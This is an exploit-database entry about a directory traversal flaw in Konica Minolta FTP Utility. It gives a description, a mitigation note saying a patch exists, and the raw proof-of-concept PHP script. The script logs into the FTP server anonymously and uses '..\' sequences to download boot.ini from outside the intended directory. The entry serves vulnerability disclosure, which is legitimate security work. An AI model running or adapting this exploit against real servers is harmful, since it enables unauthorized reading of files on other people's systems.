header-logo
Suggest Exploit
vendor:
FTP Utility
by:
shinnai
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: FTP Utility
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:konica_minolta:ftp_utility
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

Konica Minolta FTP Utility directory traversal vulnerability

A directory traversal vulnerability exists in Konica Minolta FTP Utility, which allows an attacker to read arbitrary files on the vulnerable system. This is due to the application not properly validating user-supplied input, allowing an attacker to traverse the directory structure and read files outside of the intended directory. This vulnerability can be exploited by sending a specially crafted FTP request containing directory traversal characters (e.g. '../') to the vulnerable server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the software.
Source

Exploit-DB raw data:

/*
---------------------------------------------------------------------
Konica Minolta FTP Utility directory traversal vulnerability
Url: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
Poc: http://shinnai.altervista.org/exploits/SH-0024-20150922.html
---------------------------------------------------------------------
*/

<?php
   $local_file = 'boot.ini.txt';
   $server_file = '..\..\..\..\..\..\..\..\boot.ini';

   $conn_id = ftp_connect($ftp_server);
   $login_result = ftp_login($conn_id, "anonymous", "anonymous");

   if (ftp_get($conn_id, $local_file, $server_file, FTP_BINARY)) {
     echo "Successfully written to $local_file\n";
   } else {
     echo "There was a problem\n";
   }
   ftp_close($conn_id);
?>
---------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR